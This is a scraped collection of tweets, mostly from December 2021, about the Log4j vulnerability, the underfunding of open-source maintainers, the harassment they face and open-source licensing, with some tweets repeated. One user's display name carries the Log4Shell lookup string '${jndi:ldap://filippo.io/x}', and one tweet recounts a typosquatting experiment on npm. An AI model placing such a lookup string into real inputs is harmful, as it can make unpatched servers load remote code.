the log4j “december to remember” event this year features 0% financing on tech debt 😮
Patrick Cable (@patcable)Fri, 17 Dec 2021 15:40 GMT
seems like the entire internet is built on either small open source projects run by a couple folkx for free, and the gigantic cloud infrastructure run by a couple of companies. when either one is borked, the world goes poof
Selena (@selenalarson)Wed, 15 Dec 2021 16:14 GMT
open source maintainers to developers with jobs:
I Am Devloper (@iamdevloper)Wed, 15 Dec 2021 15:55 GMT
this high-profile vulnerability in an open source project is really reinforcing my belief that, to a dominant portion of users, the primary important thing about free software is that it is gratis, rather than libre
cron mom (@sophaskins)Sun, 12 Dec 2021 23:58 GMT
but it's not log4j's responsibility to fix this in a timely fashion. they didn't make any promises to any big corps about SLAs or any shit like that, and if there are **consequences** for those corps, that is FINE. it might suck, but that's not the dev's responsibility
Beka Valentine (@beka_valentine)Sun, 12 Dec 2021 20:55 GMT
My team could spend an entire year reviewing the code from one “npm install”. I don’t think it’s really feasible to do code review across all OSS components. But funding? Absolutely.
April King 🌀 (@CubicleApril)Mon, 13 Dec 2021 15:11 GMT
Open source is free as in puppy.
Laurie Voss (@seldo)Sun, 12 Dec 2021 16:26 GMT
A rare insightful comment on the orange site: news.ycombinator.com/item?id=295252… "Open source is not broken".
Danack (@MrDanack)Sun, 12 Dec 2021 22:11 GMT
Been thinking about the maintainers of log4j2 a ton this weekend. I'm so thankful for open source. While I get to maintain projects with support from my employer - most do this entirely with spare time. Maintainers deserve our thanks (and sponsorships!) for their work 🤗🙏
Jeff Hollan (@jeffhollan)Sun, 12 Dec 2021 17:16 GMT
Another chronically underfunded OSS library in the news. It’s simple: - Using OSS to make money? Fund it! - Want to see an OSS project advance? Fund it! - Want to help your dependencies succeed so you can hire people experienced in them? Fund them! NORMALIZE FUNDING OSS. twitter.com/benjie/status/…
Why not take 5% of your engineering budget and invest it in the various open source projects you depend on? I'd hazard the returns you'd see over the coming years from this investment would be greater than having spent that same amount on payroll.
Benjie 🐘 (@Benjie)Thu, 18 Jun 2020 13:18 +0000
Benjie 🐘 (@Benjie)Sun, 12 Dec 2021 10:05 GMT
We all agree the status quo is unsustainable. Here are 1,000 words on how we could get the role of Open Source maintainer to graduate to a real, properly paid profession. The thing is, companies need it as much as maintainers do. blog.filippo.io/professional-m…
Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile)Sat, 11 Dec 2021 19:22 GMT
This week did not show us weakness in Log4J, Java, or open source. It showed us their relevance and resilience. My 🤘🏻 to the folks keeping us safe with timely workarounds, fixes, and communications. This was a masterclass in global incident response.
Andrew Lee Rubinger (@ALRubinger)Sun, 12 Dec 2021 07:01 GMT
since everyone is talking about log4j/supply chains: in an experiment years ago, i calculated 1-bit offset utf8 strings of the top few hundred npm packages and registered packages under them. they received thousands of hits per week from machines trying to download and execute them
suzuha (@dystopiabreaker)Sat, 11 Dec 2021 08:06 GMT
Maintainable open source is not an easily solved problem. And yet most of our tech stacks would shut down if open source code was all of a sudden unavailable.
Laurie (@laurieontech)Sat, 11 Dec 2021 22:44 GMT
The Apache Log4j project is maintained by three people who are volunteering their spare time. Please don't be a jerk to them because multi-billion dollar companies are using their tool without even bothering to throw $1,000 their way.
Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people from bashing us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns. twitter.com/shipilev/statu…
Volkan Yazıcı (@yazicivo)Fri, 10 Dec 2021 16:55 GMT
Catalin Cimpanu (@campuscodi)Sat, 11 Dec 2021 17:41 GMT
It took me about 5 minutes to start locally running an open source Ruby project despite the fact that I never touched Ruby on Rails in the past & project itself didn’t have related docs. Now that’s what I call strong external community resources that are easy to find 👏
Cake is Kate. Always has been 💫 (@kefimochi)Sat, 11 Dec 2021 23:27 GMT
The market rate of a developer who can maintain a large open source project is at least $300k/yr. (Conservatively, check levels.fyi.) The most I've seen someone rack up on GitHub Sponsors and Patreon is like $1,000/month. You see the problem?
Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile)Fri, 10 Dec 2021 22:58 GMT
This is the maintainer who fixed the vulnerability that's causing millions(++?) of dollars of damage. "I work on Log4j in my spare time" "always dreamed of working on open source full time" "3 sponsors are funding @rgoers's work: Michael, Glenn, Matt" People, what are we doing.
Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile)Fri, 10 Dec 2021 22:58 GMT
orgs: hire an oss strategy person to do this for your entire product portfolio. add in “what does the project need” to the “how is this being funded?” question. eng: do this for your tech stack
fun exercise for folks with production code in github: go to the Insights tab in your repo and navigate to the Dependencies page. pick a package that looks interesting and find out how it's funded.
shelby spees (@shelbyspees)Sat, 11 Dec 2021 16:34 GMT
p🍐ris (@ParisInBmore)Sat, 11 Dec 2021 16:38 GMT
fun exercise for folks with production code in github: go to the Insights tab in your repo and navigate to the Dependencies page. pick a package that looks interesting and find out how it's funded.
shelby spees (@shelbyspees)Sat, 11 Dec 2021 16:34 GMT
This may seem like overkill, but it's really an investment in your company's stability. #OpenSource may reduce many costs of development, but it's not entirely free. Don't find out that the library that's integral to your infrastructure is un(der)-funded when it's too late.
orgs: hire an oss strategy person to do this for your entire product portfolio. add in “what does the project need” to the “how is this being funded?” question. eng: do this for your tech stack twitter.com/shelbyspees/st…
p🍐ris (@ParisInBmore)Sat, 11 Dec 2021 16:38 GMT
julia ferraioli (@juliaferraioli)Sat, 11 Dec 2021 17:53 GMT
No one is paying the log4j2 maintainers!? There is a whole page on the responsibilities of a @TheASF "Project Management Committee"... AND NO ONE IS PAYING THEM? apache.org/dev/pmc.html Open Source needs to grow the hell up. Yesterday.
Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people from bashing us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns. twitter.com/shipilev/statu…
Volkan Yazıcı (@yazicivo)Fri, 10 Dec 2021 16:55 GMT
Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile)Fri, 10 Dec 2021 22:58 GMT
Sending hugs to Log4J people. This must be an extraordinarily shitty Friday for them.
If you're running a server with #Log4J, please add the following JVM argument to your command line immediately to protect against a 0-day exploit. -Dlog4j2.formatMsgNoLookups=true lnkd.in/gHmEFJ9w #Java #Security #Infosec
Bruno Borges (@brunoborges)Fri, 10 Dec 2021 06:07 GMT
Aleksey Shipilëv (@shipilev)Fri, 10 Dec 2021 15:26 GMT
Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people from bashing us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns.
Sending hugs to Log4J people. This must be an extraordinarily shitty Friday for them. twitter.com/brunoborges/st…
Aleksey Shipilëv (@shipilev)Fri, 10 Dec 2021 15:26 GMT
Volkan Yazıcı (@yazicivo)Fri, 10 Dec 2021 16:55 GMT
This is the kind of shit open-source maintainers and visible community members deal with _constantly_. I spend a lot of my time teaching people about Kubernetes and ops stuff, possibly too much time. But I do it on my terms. Maintainers don't owe you training.
Noah Kantrowitz (@kantrn)Wed, 01 Dec 2021 21:20 GMT
So you want to fork Electron. This is not for the faint of heart, but I will tell you what you need to do.
Jacob 🌎💧🍁☀️ (@0x606)Wed, 24 Nov 2021 17:59 GMT
Sometimes you go from creator to maintainer to user. This is a valid path and is a healthy one.
Jaana Dogan ヤナ ドガン (@rakyll)Mon, 08 Nov 2021 20:53 GMT
A quick definition of Open-Source
Fabien Potencier (@fabpot)Thu, 04 Nov 2021 08:26 GMT
You mean source available, not Open Source?
Want it to be open source? Great! Go for it. Want it to have all the upsides of open source, and none of the side effects that might make you uncomfortable? Get the fuck right out of town with that. The upside of being open should come with the potential for others to benefit.
Adam Jacob (@adamhjk)Fri, 05 Nov 2021 15:40 GMT
I don’t think people realise just how prevalent this sort of thing is… We get them to the Django board all the time too. We’re all volunteers, and it can take a toll. twitter.com/mikemcquaid/st…
Being an open-source maintainer in 2021: since yesterday I have: - people in my personal DMs calling me a douche for not helping them debug their problems in my DMs - people saying “f*ck you Homebrew” (their censoring, not mine) in my personal email for a new Homebrew release
Mike McQuaid (@MikeMcQuaid)Wed, 27 Oct 2021 11:43 +0000
Aaron Bassett - 🥑🪐 (@aaronbassett)Wed, 27 Oct 2021 13:45 +0000
Still blows my mind how people increasingly think the answer to their OSS problems is to harass and abuse the maintainers (aka who can fix their problems). The abuse gets exponentially worse towards non white/cis/men maintainers. This is the “normal”. OSS is broken. twitter.com/mikemcquaid/st…
Being an open-source maintainer in 2021: since yesterday I have: - people in my personal DMs calling me a douche for not helping them debug their problems in my DMs - people saying “f*ck you Homebrew” (their censoring, not mine) in my personal email for a new Homebrew release
Mike McQuaid (@MikeMcQuaid)Wed, 27 Oct 2021 11:43 +0000
Emily Kager (@EmilyKager)Wed, 27 Oct 2021 18:30 +0000
Being an open-source maintainer in 2021: since yesterday I have: - people in my personal DMs calling me a douche for not helping them debug their problems in my DMs - people saying “f*ck you Homebrew” (their censoring, not mine) in my personal email for a new Homebrew release
Mike McQuaid (@MikeMcQuaid)Wed, 27 Oct 2021 11:43 +0000
I'm very happy to step up - it's a great plugin and I'd love to help continue the great work that @daspilker has done over the years 👏🏽
Thanks to @JamieTanna for stepping up as a @jenkinsci JobDSL plugin maintainer! And kudos to @daspilker for leading it for almost ten years 🙇 JobDSL is one of the well documented and stable plugins and it is also essential for the configuration as code ecosystem in Jenkins
Just to update on this - I'm a maintainer now, it's been released as 1.78 this morning, and I'll see over the coming weeks if there's anything other high-priority to ship 🚀 (jvt.me/mf2/2021/10/jy…)
Jamie Tanna | www.jvt.me (@JamieTanna)Wed, 27 Oct 2021 09:54 +0000
Oleg Nenashev (@oleg_nenashev)Wed, 27 Oct 2021 10:11 +0000
GitHub isn't Open Source, and its acquisition by Microsoft was not proof of their commitment to Open Source as a movement. There are other things that indicate a meaningful change in respect of the movement. ASOP is an "Open Source Project" in name and software license only.
Matthew S. Wilson (msw) (@_msw_)Sun, 24 Oct 2021 18:15 +0000
Every open source maintainer upon realizing tomorrow is October…
Devon Govett (@devongovett)Fri, 01 Oct 2021 03:02 +0000
Using this
🧗♂️ Matt Holt (@mholt6)Fri, 01 Oct 2021 05:54 +0000
An open source project either dies young as a hero or lives long enough to be horribly mismanaged into the ground by a group of big egos with misaligned incentives.
Jamon 🚜 (@jamonholmgren)Thu, 30 Sep 2021 17:02 +0000
Having worked in open source for a majority of my career now, I can say that the “just send a pull request” meme downplays the cost of software maintenance. Maintainers need to deal with the ramifications of supporting this change when the contributor has moved on #oss
David Fowler 🇧🇧💉💉 (@davidfowl)Sun, 26 Sep 2021 17:57 +0000
Tips for Reducing Dependency Upgrade Toil with WhiteSource Renovate (5 mins read).
Some tips I've picked up while working with WhiteSource Renovate to keep my projects up-to-date.
Thanks to the entire Jenkins Infra Team for their evening&weekend work to get it fixed as soon as possible! 🙇
Oleg Nenashev (@oleg_nenashev)Sat, 04 Sep 2021 16:55 +0000